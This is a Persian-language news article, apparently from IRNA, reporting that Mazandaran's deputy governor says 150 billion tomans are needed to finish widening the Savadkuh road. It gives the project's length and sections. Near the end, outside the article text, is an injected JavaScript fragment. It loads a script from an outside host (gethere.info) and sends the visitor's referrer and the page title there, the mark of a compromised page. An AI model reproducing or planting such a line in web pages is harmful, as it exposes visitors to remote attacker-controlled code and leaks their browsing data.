خانه / اخبار مراکز استان / اقتصاد مازندران / 150 میلیارد تومان اعتبار برای تعریض جاده سوادکوه نیاز است

150 میلیارد تومان اعتبار برای تعریض جاده سوادکوه نیاز است

ساری – ایرنا – معاون عمرانی استاندار مازندران گفت: اتمام طرح تعریض جاده سوادکوه به 150 میلیارد تومان اعتبار نیاز دارد.

علی نبییان روز سه شنبه در حاشیه گردهمایی دهیاران و رابطین خانه های هلال مدیریت بحران روستایی مازندران در قائمشهر به خبرنگار ایرنا گفت: براساس تصمیم دولت اعتبار مورد نیاز تکمیل این طرح از طریق منابع دولتی و دیگر منابع تامین می شود.

وی ادامه داد: با تخصیص اعتبار مورد نیاز عملیات تعریض و آماده سازی 13 کیلومتر مسیر، تکمیل سه تونل و دو پل بزرگ انجام خواهد شد.

معاون عمرانی استاندار مازندران با اشاره به تردد زیاد مسافران در مسیر جاده سوادکوه، ادامه داد: ضرورت تسریع روند تعریض این جاده در دولت از سوی مسوولان مازندران و نمایندگان این استان در مجلس شورای اسلامی پیگیری شد.

وی تکمیل و بهره برداری این طرح که بیش از یک دهه از آغاز آن گذشته را پایان امسال اعلام کرد و گفت: با بهره برداری این طرح دغدغه ترافیک سنگین این جاده مهم و حیاتی کشور رفع می شود.

طرح ملی تعریض جاده سوادکوه به منظور ایجاد راه مواصلاتی مناسب و عریض از سال 1383 آغاز شد.

این جاده به طول 84 کیلومتر به عنوان بخشی از جاده سراسری تهران – سوادکوه در چهار قطعه تعریف شد و شامل تعریض گدوک به پل سفید به طول 39 کیلومتر، پل سفید به قائمشهر به طول 21 کیلومتر، قطعه سوم الف پل سفید به قائمشهر به طول پنج کیلومتر و قطعه سوم ب پل سفید به قائمشهر به طول 19 کیلومتر است.

جاده سوادکوه – تهران یکی از جاده های پرتردد کشور به شمار می رود که در طول سال هموطنان زیادی از این مسیر برای رسیدن به دیگر نقاط کشور استفاده می کنند.

همچنین عبور قسمت هایی از این جاده از درون شهرهای شیرگاه، زیراب و پل سفید و روستاها باعث شده تا مردم ساکن در این مناطق به علت حجم بالای ترافیک متحمل مشکلاتی شوند.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *